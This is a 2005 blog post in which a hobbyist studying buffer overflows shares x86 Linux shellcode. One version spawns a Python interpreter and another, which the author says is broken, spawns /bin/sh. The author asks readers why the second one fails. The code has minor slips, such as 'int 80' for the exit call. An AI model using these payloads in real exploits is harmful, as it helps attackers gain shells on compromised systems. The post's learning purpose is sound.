Saturday, January 22, 2005

pyshellcode

For want of a better name for a shellcode that launches a python shell :)


Been researching into buffer overlows and vulnerabilities et al.

Beeing a hardcore python fanatic, I just had to try the following shellcode. I must say thanks to all the ppl with tutorials and materials over the web that I’ve read over and over again. Thank you GNU thnk you OpenSource thnk you Linux.


/*Begin Assembly Routine*/

BITS 32

xor eax,eax
jmp short string

start:
pop esi
mov byte [esi+15],al
mov [esi+16],esi
mov [esi+20],eax
mov byte al,0x0b
mov ebx,esi
lea ecx,[esi+16]
lea edx,[esi+20]
int 0x80
xor eax,eax
xor ebx,ebx
mov byte al,0x01
int 80

string:
call start
db '/usr/bin/python$XXXXNULL'

/*End Assembly Routine*/

Trying to use GAS, I ran into problems I can’t explain tho L

/*Begin problematic routine shellcode*/

jmp dummy
start:
popl %esi
xor %eax,%eax
movb %al,7(%esi)
movl %esi,8(%esi)
movl %eax,12(%esi)
movb $0xb,%al
movl %esi,%ebx
leal 8(%esi),%ecx
leal 12(%esi),%edx
int $0x80
xor %eax,%eax
xor %ebx,%ebx
movl $0x01,%eax
int $0x80
dummy:
call start
.ascii "/bin/sh"

/*End problematic routine shellcode*/

Dunno what I’m doing wrong in the problematic routine. Any one any ideas?

0 Comments:

Post a Comment

<< Home